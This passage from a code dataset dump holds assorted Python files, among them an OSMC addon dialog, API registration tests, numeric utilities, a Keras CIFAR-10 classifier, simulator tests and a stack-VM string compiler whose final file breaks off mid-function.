sel_item, addon=None):\n super(AddonInfoGui, self).__init__(xmlFilename=strXMLname,\n scriptPath=strFallbackPath,\n defaultSkin=strDefaultName)\n\n self._addon = addon\n self._lang = None\n self.action = False\n self.sel_item = sel_item\n\n def onInit(self):\n self.getControl(50001).setLabel(self.sel_item.shortdesc)\n self.getControl(50002).setText(self.sel_item.longdesc)\n self.getControl(50003).setLabel(self.sel_item.version)\n self.getControl(50004).setLabel(self.sel_item.maintainedby)\n self.getControl(50005).setLabel(self.sel_item.lastupdated)\n self.getControl(50006).setImage(self.sel_item.current_icon, True)\n self.getControl(50007).setLabel(self.sel_item.name)\n\n if self.sel_item.installed:\n self.getControl(6).setLabel(self.lang(32004))\n\n else:\n self.getControl(6).setLabel(self.lang(32003))\n\n @property\n def addon(self):\n if not self._addon:\n self._addon = xbmcaddon.Addon(ADDON_ID)\n return self._addon\n\n def lang(self, value):\n if not self._lang:\n retriever = LangRetriever(self.addon)\n self._lang = retriever.lang\n return self._lang(value)\n\n def onClick(self, controlID):\n if controlID == 6:\n lbl = self.getControl(6).getLabel()\n\n if lbl == self.lang(32003):\n self.action = 'Install'\n else:\n self.action = 'Uninstall'\n\n self.close()\n\n elif controlID == 7:\n self.close()\n","repo_name":"osmc/osmc","sub_path":"package/mediacenter-addon-osmc/src/script.module.osmcsetting.apfstore/resources/lib/apfstore/apf_gui.py","file_name":"apf_gui.py","file_ext":"py","file_size_in_byte":6803,"program_lang":"python","lang":"en","doc_type":"code","stars":1587,"dataset":"github-code","pt":"63"} +{"seq_id":"36448702639","text":"from lib.my_requests import MyRequests\r\nfrom lib.base_case import BaseCase\r\nfrom lib.assertions import Assertions\r\nimport pytest\r\nfrom random import choices\r\nimport string\r\nimport allure\r\n\r\n\r\n# python -m pytest -s tests/test_user_register.py -k test_create_user_successfully\r\n# python -m pytest -s tests/test_user_register.py -k test_create_user_with_existing_email\r\n\r\n# Homework: ex. 15 Test user method\r\n# python -m pytest -s tests/test_user_register.py -k test_create_user_with_invalid_email\r\n# python -m pytest -s tests/test_user_register.py -k test_create_user_with_one_field_missing\r\n# python -m pytest -s tests/test_user_register.py -k test_name_fields_lengths_while_user_creation\r\n\r\n\r\n@allure.epic(\"Registration cases\")\r\nclass TestUserRegister(BaseCase):\r\n missing_fields = [\r\n \"password\",\r\n \"username\",\r\n \"firstName\",\r\n \"lastName\",\r\n \"email\"\r\n ]\r\n\r\n lengths = [\r\n 1,\r\n 251\r\n ]\r\n\r\n names = [\r\n \"username\" # ,\r\n # \"firstName\",\r\n # \"lastName\"\r\n ]\r\n\r\n @allure.title(\"Create user successfully\")\r\n @allure.description(\"This test creates user successfully.\")\r\n @allure.label(\"Positive/Negative\", 'Positive')\r\n @allure.severity(allure.severity_level.BLOCKER)\r\n def test_create_user_successfully(self):\r\n data = self.prepare_registration_data()\r\n\r\n response = MyRequests.post(\"/user\", data=data)\r\n\r\n Assertions.assert_code_status(response, 200)\r\n Assertions.assert_json_has_key(response, \"id\")\r\n\r\n @allure.title(\"Attempt to create a user with existing email\")\r\n @allure.description(\"This test checks user creation with existing email.\")\r\n @allure.label(\"Positive/Negative\", 'Negative')\r\n @allure.severity(allure.severity_level.CRITICAL)\r\n def test_create_user_with_existing_email(self):\r\n email = 'vinkotov@example.com'\r\n data = self.prepare_registration_data(email)\r\n\r\n response = MyRequests.post(\"/user\", data=data)\r\n\r\n Assertions.assert_code_status(response, 400)\r\n Assertions.assert_decoded_content(response, f\"Users with email '{email}' already exists\")\r\n\r\n @allure.title(\"Attempt to create a user with invalid email\")\r\n @allure.description(\"This test checks user creation with invalid email w/o @ symbol.\")\r\n @allure.label(\"Positive/Negative\", 'Negative')\r\n @allure.severity(allure.severity_level.CRITICAL)\r\n def test_create_user_with_invalid_email(self):\r\n data = self.prepare_registration_data()\r\n\r\n data[\"email\"] = data[\"email\"].replace(\"@\", \"\")\r\n\r\n response = MyRequests.post(\"/user\", data=data)\r\n\r\n Assertions.assert_code_status(response, 400)\r\n Assertions.assert_decoded_content(response, f\"Invalid email format\")\r\n\r\n @allure.description(\"This test checks user creation when one field is missing.\")\r\n @allure.severity(allure.severity_level.MINOR)\r\n @allure.label(\"Positive/Negative\", 'Negative')\r\n @allure.title(\"Attempt to create a user with missing field: {missing_field}\")\r\n @pytest.mark.parametrize(\"missing_field\", missing_fields)\r\n def test_create_user_with_one_field_missing(self, missing_field):\r\n data = self.prepare_registration_data()\r\n\r\n data.pop(missing_field)\r\n\r\n response = MyRequests.post(\"/user\", data=data)\r\n\r\n Assertions.assert_code_status(response, 400)\r\n Assertions.assert_decoded_content(response, f\"The following required params are missed: {missing_field}\")\r\n\r\n @allure.title(\"Register with parametrized name with length: {length}\")\r\n @allure.description(\"This test checks user creation with invalid name lengths.\")\r\n @allure.severity(allure.severity_level.TRIVIAL)\r\n @allure.label(\"Positive/Negative\", 'Negative')\r\n @pytest.mark.parametrize(\"length\", lengths)\r\n @pytest.mark.parametrize(\"name\", names)\r\n def test_name_fields_lengths_while_user_creation(self, length, name):\r\n data = self.prepare_registration_data()\r\n\r\n source_for_name = string.ascii_letters + string.digits\r\n rand_name = \"\".join(choices(source_for_name, k=length))\r\n\r\n data[name] = rand_name\r\n\r\n response = MyRequests.post(\"https://playground.learnqa.ru/api/user\", data=data)\r\n\r\n if length < 2:\r\n Assertions.assert_code_status(response, 400)\r\n Assertions.assert_decoded_content(response, f\"The value of '{name}' field is too short\")\r\n\r\n if length > 250:\r\n Assertions.assert_code_status(response, 400)\r\n Assertions.assert_decoded_content(response, f\"The value of '{name}' field is too long\")\r\n","repo_name":"taskri/LearnQA_PythonAPI","sub_path":"tests/test_user_register.py","file_name":"test_user_register.py","file_ext":"py","file_size_in_byte":4596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"12758063706","text":"# -*- coding: utf-8 -*-\n\nimport numpy as np\n\n\ndef get_angle(v, w, radians=False):\n \"\"\"\n Calculates angle between two vectors\n\n Parameters\n ----------\n v : float\n vector 1.\n w : float\n vector 1.\n radians : bool, optional\n To return the result in radians or degrees. The default is False.\n\n Returns\n -------\n float\n Angle between v and w.\n\n \"\"\"\n\n if np.linalg.norm(v) == 0 or np.linalg.norm(w) == 0 or np.all(v == w):\n return 0\n cosine = np.dot(v, w) / (np.linalg.norm(v) * np.linalg.norm(w))\n\n if radians:\n return np.arccos(cosine)\n else:\n return np.rad2deg(np.arccos(cosine))\n\n\n\ndef fft_interpolate(function, interpolation_factor=2, axis=None):\n \"\"\"\n This method will interpolate using a Fast-Fourier Transform\n \n if I = interpolation_factor\n This function withh recieve f(x,y,z) with dimensions of (nx,ny,nz)\n and returns f(x,y,z) with dimensions of (nx*I,ny*I,nz*I)\n\n Parameters\n ----------\n function : np.ndarray\n The values array to do the interpolation on.\n interpolation_factor : int, optional\n Interpolation Factor, by default 2\n\n Returns\n -------\n np.ndarray\n The interpolated points\n \"\"\"\n\n if axis is None:\n axis = np.arange(function.ndim)\n if type(axis) is int:\n axis = [axis]\n function = np.array(function)\n eigen_fft = np.fft.fftn(function)\n shifted_fft = np.fft.fftshift(eigen_fft)\n pad_width = []\n factor = 0\n for idim in range(function.ndim):\n if idim in axis:\n n = shifted_fft.shape[idim]\n pad = n * (interpolation_factor - 1) // 2\n factor += 1\n else:\n pad = 0\n pad_width.append([pad, pad])\n new_matrix = np.pad(shifted_fft, pad_width, \"constant\", constant_values=0)\n new_matrix = np.fft.ifftshift(new_matrix)\n if \"complex\" in function.dtype.name:\n interpolated = np.fft.ifftn(new_matrix) * (interpolation_factor * factor)\n else:\n interpolated = np.real(np.fft.ifftn(new_matrix)) * (\n interpolation_factor * factor\n )\n return interpolated\n\ndef change_of_basis(tensor,A,B):\n \"\"\"changes the basis of a tensor given the column vectors of A and B\n\n This changes the basis from B to A. The tensor has to be in the A basis.\n\n Parameters\n ----------\n tensor : np.ndarray\n Rank 1 or rank 2 tensor\n A : np.ndarray\n column vectors of the A basis\n B : np.ndarray\n column vectors of the B basis\n \"\"\"\n transform = np.linalg.inv(B).dot(A)\n n_dim = len(tensor.shape)\n if n_dim == 1:\n tensor_b = transform.dot(tensor)\n else:\n transform_inv = np.linalg.inv(transform)\n tensor_b = transform_inv.dot(tensor).dot(transform)\n # tensor_b = transform.dot(tensor).dot(transform_inv)\n return tensor_b\n","repo_name":"romerogroup/pyprocar","sub_path":"pyprocar/utils/mathematics.py","file_name":"mathematics.py","file_ext":"py","file_size_in_byte":2887,"program_lang":"python","lang":"en","doc_type":"code","stars":158,"dataset":"github-code","pt":"63"} +{"seq_id":"31631119775","text":"import math\nimport os\nimport platform\nimport sys\n\nfrom ..detail.panel import Panel as detailPanel\n\nif platform.system () == 'Windows' and sys.version_info >= (3, 8):\n # Starting from 3.8, Python no longer searches for DLLs in PATH\n os.add_dll_directory (r\"C:\\msys64\\mingw64\\bin\")\nimport cairocffi\n\n\n\nMM_TO_PT = 72.0 / 25.4\nMODULE_HEIGHT = 128.5#mm\n\n\n\nclass Panel:\n\n #--------------------------------------------------------------------------\n\n def generate (self, path, root):\n for module in root.modules:\n self.generate_module (path, module)\n\n\n #--------------------------------------------------------------------------\n\n def generate_module (self, path, module):\n path_svg_pp = os.path.join (path, 'panel_vcvrack-preprocess.svg')\n path_svg = os.path.join (path, 'panel_vcvrack.svg')\n\n surface = cairocffi.SVGSurface (path_svg_pp, module.width.pt, MODULE_HEIGHT * MM_TO_PT)\n surface.set_document_unit (cairocffi.SVG_UNIT_PT)\n context = cairocffi.Context (surface)\n\n panel = detailPanel ()\n panel.generate_module (context, module, simulated=True)\n\n surface.finish ()\n\n self.post_process (path_svg_pp, path_svg)\n\n\n #--------------------------------------------------------------------------\n # VCV Rack doesn't interpret properly rgb() color style.\n # Post-process the file to solve that problem.\n\n def post_process (self, path_svg_pp, path_svg):\n with open (path_svg_pp, 'r', encoding='utf-8') as file_pp:\n with open (path_svg, 'w', encoding='utf-8') as file:\n for line in file_pp:\n line = self.post_process_line (line)\n file.write (line)\n\n\n #--------------------------------------------------------------------------\n # Note: fragile parser\n\n def post_process_line (self, line):\n def percent_to_hex (ps):\n s = ps [:-1]\n f = float (s) * 2.55\n i = int (f)\n return '%0.2x' % i\n\n while 'rgb(' in line:\n start = line.find ('rgb(')\n end = line.find (')')\n sub = line [start+4:end]\n arr = sub.split (',')\n color_hex = '#' + ''.join (map (lambda s: percent_to_hex (s), arr))\n line = line.replace (line [start:end+1], color_hex)\n\n return line\n","repo_name":"ricardomatias/eurorack-blocks","sub_path":"build-system/erbui/generators/vcvrack/panel.py","file_name":"panel.py","file_ext":"py","file_size_in_byte":2267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"63"} +{"seq_id":"29822896448","text":"import os.path as osp\n\nimport magnum as mn\nimport pytest\n\nfrom habitat.sims.habitat_simulator.sim_utilities import (\n bb_ray_prescreen,\n snap_down,\n)\nfrom habitat_sim import Simulator, built_with_bullet\nfrom habitat_sim.metadata import MetadataMediator\nfrom habitat_sim.physics import MotionType\nfrom habitat_sim.utils.settings import default_sim_settings, make_cfg\n\n\n@pytest.mark.skipif(\n not built_with_bullet,\n reason=\"ArticulatedObject API requires Bullet physics.\",\n)\n@pytest.mark.skipif(\n not osp.exists(\"data/test_assets/scenes/plane.glb\"),\n reason=\"Requires the plane.glb habitat test asset\",\n)\n@pytest.mark.parametrize(\n \"support_margin\",\n [0.0, 0.04, 0.1],\n)\n@pytest.mark.parametrize(\"obj_margin\", [0.0, 0.04, 0.1])\n@pytest.mark.parametrize(\"stage_support\", [True, False])\ndef test_snap_down(support_margin, obj_margin, stage_support):\n \"\"\"\n Test snapping objects onto stages and other assets.\n \"\"\"\n\n mm = MetadataMediator()\n\n otm = mm.object_template_manager\n stm = mm.stage_template_manager\n\n # prepare the support object depending on 'stage_support' mode. Either a STATIC object or a stage mesh.\n cube_template_handle = otm.get_template_handles(\"cubeSolid\")[0]\n cube_stage_template_handle = \"cube_stage_object\"\n plane_stage_template_handle = \"plane_stage\"\n if not stage_support:\n # setup a cube ground plane object config\n cube_template = otm.get_template_by_handle(cube_template_handle)\n cube_template.scale = mn.Vector3(10, 0.05, 10)\n cube_template.margin = support_margin\n otm.register_template(cube_template, cube_stage_template_handle)\n else:\n # setup a stage using the plane.glb test asset\n new_stage_template = stm.create_new_template(\n handle=plane_stage_template_handle\n )\n new_stage_template.render_asset_handle = (\n \"data/test_assets/scenes/plane.glb\"\n )\n new_stage_template.margin = support_margin\n new_stage_template.orient_up = mn.Vector3(0, 0, 1)\n new_stage_template.orient_front = mn.Vector3(0, 1, 0)\n # need to make the scale reasonable or navmesh takes forever to recompute\n # BUG: this scale is not used by sim currently...\n new_stage_template.scale = mn.Vector3(0.01, 1.0, 0.01)\n # temporary hack: load and arbitrary navmesh, we don't use it anyway\n new_stage_template.navmesh_asset_handle = (\n \"data/test_assets/scenes/simple_room.stage_config.navmesh\"\n )\n stm.register_template(\n template=new_stage_template,\n specified_handle=plane_stage_template_handle,\n )\n\n # setup test cube object config\n cube_template = otm.get_template_by_handle(cube_template_handle)\n cube_template.margin = obj_margin\n otm.register_template(cube_template)\n\n # Test snapping a cube object onto another object\n sim_settings = default_sim_settings.copy()\n sim_settings[\"sensor_height\"] = 0\n sim_settings[\"scene\"] = \"NONE\"\n if stage_support:\n sim_settings[\"scene\"] = plane_stage_template_handle\n hab_cfg = make_cfg(sim_settings)\n hab_cfg.metadata_mediator = mm\n with Simulator(hab_cfg) as sim:\n rom = sim.get_rigid_object_manager()\n\n # add the cube objects\n cube_stage_obj = None\n support_obj_ids = [-1]\n if not stage_support:\n cube_stage_obj = rom.add_object_by_template_handle(\n cube_stage_template_handle\n )\n assert (\n cube_stage_obj.is_alive\n ), \"Failure to add object may indicate configuration issue or no 'cube_stage_template_handle'.\"\n support_obj_ids = [cube_stage_obj.object_id]\n cube_obj = rom.add_object_by_template_handle(cube_template_handle)\n assert cube_obj.is_alive\n\n # test with various combinations of motion type for both objects\n for object_motion_type in [MotionType.KINEMATIC, MotionType.DYNAMIC]:\n for support_motion_type in [\n MotionType.STATIC,\n MotionType.KINEMATIC,\n MotionType.DYNAMIC,\n ]:\n if not stage_support:\n cube_stage_obj.motion_type = support_motion_type\n cube_obj.motion_type = object_motion_type\n\n # snap will fail because object COM is inside the support surface shape so raycast won't detect the support surface\n initial_translation = mn.Vector3(0, 0, 0.1)\n cube_obj.translation = initial_translation\n snap_success = snap_down(\n sim, cube_obj, support_obj_ids=support_obj_ids\n )\n assert not snap_success\n assert (\n initial_translation - cube_obj.translation\n ).length() < 1e-5, (\n \"Translation should not be changed after snap failure.\"\n )\n bb_ray_prescreen_results = bb_ray_prescreen(\n sim, cube_obj, support_obj_ids=support_obj_ids\n )\n assert bb_ray_prescreen_results[\"surface_snap_point\"] is None\n\n # with object above the support, snap will succeed.\n cube_obj.translation = mn.Vector3(0, 0.2, 0)\n snap_success = snap_down(\n sim, cube_obj, support_obj_ids=support_obj_ids\n )\n assert snap_success\n bb_ray_prescreen_results = bb_ray_prescreen(\n sim, cube_obj, support_obj_ids=support_obj_ids\n )\n assert (\n cube_obj.translation\n - bb_ray_prescreen_results[\"surface_snap_point\"]\n ).length() < 1e-5, (\n \"Translation should be the pre-screened location.\"\n )\n assert (\n bb_ray_prescreen_results[\"surface_snap_point\"] is not None\n )\n if stage_support:\n # don't need 3 iterations for stage b/c no motion types to test\n break\n","repo_name":"facebookresearch/habitat-lab","sub_path":"test/test_sim_utils.py","file_name":"test_sim_utils.py","file_ext":"py","file_size_in_byte":6139,"program_lang":"python","lang":"en","doc_type":"code","stars":1467,"dataset":"github-code","pt":"62"} +{"seq_id":"8228464055","text":"# Importing the Keras libraries and packages\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Conv2D\r\nfrom keras.layers import MaxPooling2D\r\nfrom keras.layers import Flatten,Dropout\r\nfrom keras.layers import Dense\r\nfrom keras.datasets import cifar10\r\nimport matplotlib.pyplot as plt\r\nfrom keras.utils import np_utils\r\n\r\nimg_size = 32\r\nimg_channels = 3\r\nnb_classes = 10\r\n# length of the image after we flatten the image into a 1-D array\r\nimg_size_flat = img_size * img_size * img_channels\r\nnb_files_train = 5\r\nimages_per_file = 10000 \r\n# number of all the images in the training dataset\r\nnb_images_train = nb_files_train * images_per_file\r\nepochs=25\r\n\r\n(x_train, y_train), (x_test, y_test) = cifar10.load_data()\r\ny_train = np_utils.to_categorical(y_train, nb_classes)\r\ny_test = np_utils.to_categorical(y_test, nb_classes)\r\n\r\nx_train = x_train.astype('float32')\r\nx_test = x_test.astype('float32')\r\nx_train /= 255\r\nx_test /= 255\r\n\r\nmodel = Sequential()\r\nmodel.add(Conv2D(filters=64,\r\n kernel_size=(3, 3),\r\n activation='relu',\r\n kernel_initializer='he_normal',\r\n input_shape=(32, 32, 3)))\r\nmodel.add(MaxPooling2D((2, 2)))\r\nmodel.add(Conv2D(filters=256,\r\n kernel_size=(2, 2),\r\n kernel_initializer='he_normal',\r\n activation='relu'))\r\nmodel.add(MaxPooling2D((2, 2)))\r\nmodel.add(Flatten())\r\nmodel.add(Dense(1024, activation='relu'))\r\nmodel.add(Dropout(0.4))\r\nmodel.add(Dense(10, activation='softmax'))\r\n\r\nmodel.compile(optimizer='adam',\r\n loss='categorical_crossentropy',\r\n metrics=['accuracy'])\r\n\r\nx_train = x_train.astype('float32')\r\nx_test = x_test.astype('float32')\r\nx_train /= 255\r\nx_test /= 255\r\n\r\nhistory=model.fit(x_train, y_train,\r\n batch_size=32,\r\n epochs=18,\r\n verbose=1,\r\n validation_data=(x_test, y_test))\r\nimport numpy as np\r\nloss, accuracy = model.evaluate(x_test, y_test)\r\nresult = model.predict(x_test)\r\npredicted_class = np.argmax(result, axis=1)\r\ntrue_class = np.argmax(y_test, axis=1)\r\nnum_correct = np.sum(predicted_class == true_class) \r\naccuracy = float(num_correct)/result.shape[0]\r\n\r\nplt.plot(history.history['acc'])\r\nplt.plot(history.history['val_acc'])\r\nplt.title('model accuracy')\r\nplt.ylabel('accuracy')\r\nplt.xlabel('epoch')\r\nplt.legend(['train', 'test'], loc='upper left')\r\nplt.show()\r\n# summarize history for loss\r\nplt.plot(history.history['loss'])\r\nplt.plot(history.history['val_loss'])\r\nplt.title('model loss')\r\nplt.ylabel('loss')\r\nplt.xlabel('epoch')\r\nplt.legend(['train', 'test'], loc='upper left')\r\nplt.show()","repo_name":"prathyushreddy1/ImageClassification","sub_path":"ImageClassify.py","file_name":"ImageClassify.py","file_ext":"py","file_size_in_byte":2626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"31241330833","text":"import string\n\n\nclass CharsetError(Exception):\n pass\n\n\nCHARSETS = {\n \"a\": string.ascii_lowercase,\n \"A\": string.ascii_uppercase,\n \"1\": string.digits,\n \"!\": string.punctuation,\n \"*\": string.printable,\n}\n\nPREDEFINED_CHARSETS = {\n \"base32\": CHARSETS[\"A\"] + \"234567=\",\n \"base64\": CHARSETS[\"a\"] + CHARSETS[\"A\"] + CHARSETS[\"1\"] + \"/+=\",\n \"printable\": CHARSETS[\"*\"],\n}\n\n\ndef get_charset(charset):\n charset = charset or \"printable\"\n if charset in PREDEFINED_CHARSETS:\n return PREDEFINED_CHARSETS[charset].encode(\"ascii\")\n try:\n _ = b\"\"\n for c in set(charset):\n _ += CHARSETS[c].encode(\"ascii\")\n return _\n except KeyError:\n raise CharsetError(\"Bad character set: \", charset)\n","repo_name":"hellman/xortool","sub_path":"xortool/charset.py","file_name":"charset.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","stars":1296,"dataset":"github-code","pt":"62"} +{"seq_id":"41498672053","text":"# 문제\n# 오늘은 2007년 1월 1일 월요일이다. 그렇다면 2007년 x월 y일은 무슨 요일일까? 이를 알아내는 프로그램을 작성하시오.\n\n# 입력\n# 첫째 줄에 빈 칸을 사이에 두고 x(1 ≤ x ≤ 12)와 y(1 ≤ y ≤ 31)이 주어진다. 참고로 2007년에는 1, 3, 5, 7, 8, 10, 12월은 31일까지, 4, 6, 9, 11월은 30일까지, 2월은 28일까지 있다.\n\n# 출력\n# 첫째 줄에 x월 y일이 무슨 요일인지에 따라 SUN, MON, TUE, WED, THU, FRI, SAT중 하나를 출력한다.\n\n# 예제 입력 1 \n# 1 1\n# 예제 출력 1 \n# MON\n\n# 예제 입력 2 \n# 3 14\n# 예제 출력 2 \n# WED\n\n# 예제 입력 3 \n# 9 2\n# 예제 출력 3 \n# SUN\n\n# day=0 >>임의의 값\n# arrlist=[31,28,31,30,31,30,31,31,30,31,30,31] >>월에 맞는 일 수\n# weekday=[\"SUN\",\"MON\",\"TUE\",\"WED\",\"THU\",\"FRI\",\"SAT\"] >>요일에 맞는 날짜\n# x,y=map(int,(input()).split()) >>x y 값 받고\n# for i in range (x-1): >>반복문 돌려서\n# day=day+arrlist[i] >> 일 수를 다 day 에 더해줌\n# day=(day+y)%7 >> day 에 y 더해서 7로 나눈 나머지\n# print(weekday[day]) >> 요일리스트에서 인덱싱으로 찾음\n\n \nm,d=map(int,input().split())\nmlist=(31,28,31,30,31,30,31,31,30,31,30,31)\nweekday=(\"SUN\",\"MON\",\"TUE\",\"WED\",\"THU\",\"FRI\",\"SAT\")\nmaddtotal=0\nfor i in range(0,m-1):\n maddtotal+=mlist[i]\nprint(weekday[(maddtotal+d)%7])\n","repo_name":"gsandoo/BOJ","sub_path":"mathmatics/1924.py","file_name":"1924.py","file_ext":"py","file_size_in_byte":1607,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"43223142282","text":"# coding: utf-8\n\n\"\"\"\nDemonstrates how to use modifiers.\n\nNumber of modifiers are already defined in ``crappy.modifiers``, but it can\nalso be a function or any class containing the ``.evaluate()`` method.\n\nNo hardware required.\n\"\"\"\n\nimport crappy\n\n\n# Example of class used as a Modifier\nclass My_offset_modifier:\n def __init__(self, offset):\n self.offset = offset\n\n def evaluate(self, data):\n \"\"\"Method returning the modified values.\n\n Remember: data is ALWAYS a :obj:`dict`.\n Returning :obj:`None` will drop the data.\n \"\"\"\n\n for k in data:\n if k != 't(s)': # Move everything except the time\n data[k] += self.offset\n return data # Do not forget to return it!\n\n\n# Example of function used as a modifier\ndef mul_by_10(data):\n data['cmd'] *= 10\n return data\n\n\nif __name__ == \"__main__\":\n generator = crappy.blocks.Generator(path=[\n {'type': 'constant', 'value': 0, 'condition': 'delay=2'},\n {'type': 'constant', 'value': 1, 'condition': 'delay=2'}\n ] * 20, spam=True)\n graph = crappy.blocks.Grapher(('t(s)', 'cmd'))\n smooth_graph = crappy.blocks.Grapher(('t(s)', 'cmd'))\n\n crappy.link(generator, graph)\n # We add a moving average to smooth the data\n # and our custom condition that adds and offset of 5\n crappy.link(generator, smooth_graph,\n # The modifiers will be applied in the order of the list\n modifier=[\n # Integrated modifier, will average the values on 100 points\n crappy.modifier.Moving_avg(100),\n # Will add an offset\n My_offset_modifier(5),\n # Will multiply the result by 10\n mul_by_10])\n\n # This block will simply print \"Triggered\" followed by the received data\n r = crappy.blocks.Reader('Triggered')\n\n # Only forward data when the label \"cycle\" changed its value\n crappy.link(generator, r,\n modifier=crappy.modifier.Trig_on_change('cycle'))\n\n crappy.start()\n","repo_name":"LaboratoireMecaniqueLille/crappy","sub_path":"Examples/modifiers.py","file_name":"modifiers.py","file_ext":"py","file_size_in_byte":1959,"program_lang":"python","lang":"en","doc_type":"code","stars":69,"dataset":"github-code","pt":"62"} +{"seq_id":"24795402190","text":"# determines if an integer is palindromic via recursion\ndef is_palindrome(x):\n x = str(x)\n if len(x) <= 1:\n return True\n if int(x) < 0:\n return False\n else:\n first = x[0:1]\n last = x[-1] # horrid performance\n rest = x[1:]\n if first not in rest:\n return False\n else:\n return (first is last) and is_palindrome(x[1:-1])\n","repo_name":"bravo-c/InterviewQuestionsAnswered","sub_path":"palindrome.py","file_name":"palindrome.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"18376532097","text":"# -*- coding: utf-8 -*-\n\nfrom ..Helpers.types import Types\nfrom ..Helpers.base import dbstore, dbload\nfrom ..Helpers.loop import Loop\nfrom ..Helpers.commands import Dup, Store, Push, Mul, DMalloc, Load, Compare, DBStore, Add, DBLoad, Jnz, Label, Jump, Jz, Sub\n\n\nclass StringCompiler:\n @staticmethod\n def store(commands, data):\n \"\"\" Генерация инструкций для записи строки из стека в heap memory. \"\"\"\n str_start_pointer = data.var(Types.INT)\n end_str_pointer = data.var(Types.INT)\n\n # Добавляем к требуемому размеру памяти 1 - для escape-нуля (маркера конца строки)\n commands.add(Push, 1)\n commands.add(Add)\n commands.add(Dup)\n # Выделяем память размером = числу на стеке (ранее мы записали туда длину строки)\n commands.add(DMalloc, 0)\n commands.add(Dup)\n commands.add(Store, str_start_pointer)\n # Выносим инвариант цикла - указатель на конец строки - в переменную\n commands.add(Add)\n commands.add(Store, end_str_pointer)\n\n def cycle_body(_counter, b, c):\n # Последовательно сохраняем все символы в выделенной памяти в обратном порядке (т. к. берем со стека)\n dbstore(end_str_pointer, _counter, commands, invert=True, value=-2)\n\n counter = Loop.stack(commands, data, cycle_body, load_counter=False, return_counter=True)\n\n # Дописываем 0 в последнюю ячейку памяти - это маркер конца строки\n commands.add(Push, 0)\n dbstore(str_start_pointer, counter, commands)\n\n # Отдаем на стек указатель на начало строки для дальнейшего использования\n commands.add(Load, str_start_pointer)\n\n @staticmethod\n def strlen(commands, data, type):\n \"\"\" Генерация инструкций для получения длины строки, находящейся на стеке. \"\"\"\n str_start_pointer = data.var(Types.INT)\n # Разыменовываем лежащий на стеке указатель и записываем его в переменную\n commands.add(Store, str_start_pointer)\n\n # Считываем строку из памяти до конца (пока не встретим 0), подсчитывая кол-во символов (его кладем на стек)\n Loop.data(commands, data, str_start_pointer, memory_type='heap')\n\n @staticmethod\n def strget(commands, data, type):\n \"\"\" Генерация инструкций для получения определенного символа строки \"\"\"\n # Прибавляем к номеру ячейки с началом строки номер требуемого символа (offset)\n commands.add(Add)\n # Загружаем на стек символ по номеру его ячейки в heap memory\n commands.add(DBLoad, 0)\n\n @staticmethod\n def strset(commands, data, type):\n \"\"\" Генерация инструкций для замены определенного символа строки \"\"\"\n # Вычисляем ячейки heap memory, где находится заменяемый символ\n commands.add(Add)\n # Производим замену символа\n commands.add(DBStore, 0)\n\n @staticmethod\n def strsub(commands, data, type):\n \"\"\" Генерация инструкций для получение подстроки строки \"\"\"\n substr_length = data.var(Types.INT)\n substr_start_pointer = data.var(Types.INT)\n\n finish_label = data.label()\n\n # Сохраняем длину подстроки\n commands.add(Store, substr_length)\n\n commands.add(Add)\n commands.add(Store, substr_start_pointer)\n\n # Кладем на стек 0 - маркер конца строки\n commands.add(Push, 0)\n\n def cycle_body(_counter, a, b):\n commands.add(Load, _counter)\n commands.add(Load, substr_length)\n commands.add(Compare, 5)\n # Если уже прочитали и записали подстркоу требуемой длины - выходим из цикла\n commands.add(Jnz, finish_label)\n # Загружаем очередной символ подстроки из heap memory\n dbload(substr_start_pointer, _counter, commands)\n\n Loop.data(commands, data, substr_start_pointer, cycle_body, load_counter=False, memory_type='heap')\n\n commands.add(Label, finish_label)\n # Записываем на стек длину подстроки + 1 (для маркера конца строки - нуля)\n commands.add(Load, substr_length)\n\n StringCompiler.store(commands, data)\n\n @staticmethod\n def strdup(commands, data, type):\n \"\"\" Генерация инструкций для дублирования строки \"\"\"\n str_start_pointer = data.var(Types.INT)\n\n # Разыменовываем лежащий на стеке указатель и записываем его в переменную\n commands.add(Store, str_start_pointer)\n\n # Кладем на стек 0 - маркер конца строки\n commands.add(Push, 0)\n\n def cycle_body(_counter, a, b):\n dbload(str_start_pointer, _counter, commands)\n\n # Читаем строку и кладем её на стек\n Loop.data(commands, data, str_start_pointer, cycle_body, memory_type='heap')\n\n StringCompiler.store(commands, data)\n\n @staticmethod\n def strcat_first(commands, data, type):\n \"\"\" Генерация инструкций для дублирования первой из конкатенируемых строки \"\"\"\n str_start_pointer = data.var(Types.INT)\n\n commands.add(Store, str_start_pointer)\n commands.add(Push, 0)\n\n def cycle_body(_counter, a, b):\n dbload(str_start_pointer, _counter, commands)\n\n # Читаем строку и кладем её на стек\n Loop.data(commands, data, str_start_pointer, cycle_body, memory_type='heap')\n\n @staticmethod\n def strcat_second(commands, data, type):\n \"\"\" Генерация инструкций для дублирования второй из конкатенируемых строки и запись её в памяти за первой \"\"\"\n str_start_pointer = data.var(Types.INT)\n str_length = data.var(Types.INT)\n\n commands.add(Store, str_start_pointer)\n commands.add(Store, str_length)\n\n def cycle_body(_counter, a, b):\n dbload(str_start_pointer, _counter, commands)\n\n # Читаем строку и кладем её на стек\n Loop.data(commands, data, str_start_pointer, cycle_body, memory_type='heap')\n\n commands.add(Load, str_length)\n commands.add(Add)\n\n StringCompiler.store(commands, data)\n\n @staticmethod\n def strmake(commands, data):\n \"\"\" Генерация инструкций для создания строки заданной длины с повторяющимся символом \"\"\"\n str_start_pointer = data.var(Types.INT)\n str_length = data.var(Types.INT)\n basis_symbol = data.var(Types.CHAR)\n\n finish_label = data.label()\n\n commands.add(Dup)\n # Сохраняем длину строки в переменную\n commands.add(Store, str_length)\n # Выделяем память = указанной длине строки +1 (плюс маркер конца строки - 0)\n commands.add(DMalloc, 1)\n commands.add(Store, str_start_pointer)\n commands.add(Store, basis_symbol)\n\n def cycle_body(_counter, b, c):\n commands.add(Load, _counter)\n commands.add(Load, str_length)\n commands.add(Compare, 5)\n commands.add(Jnz, finish_label)\n commands.add(Load, basis_symbol)\n 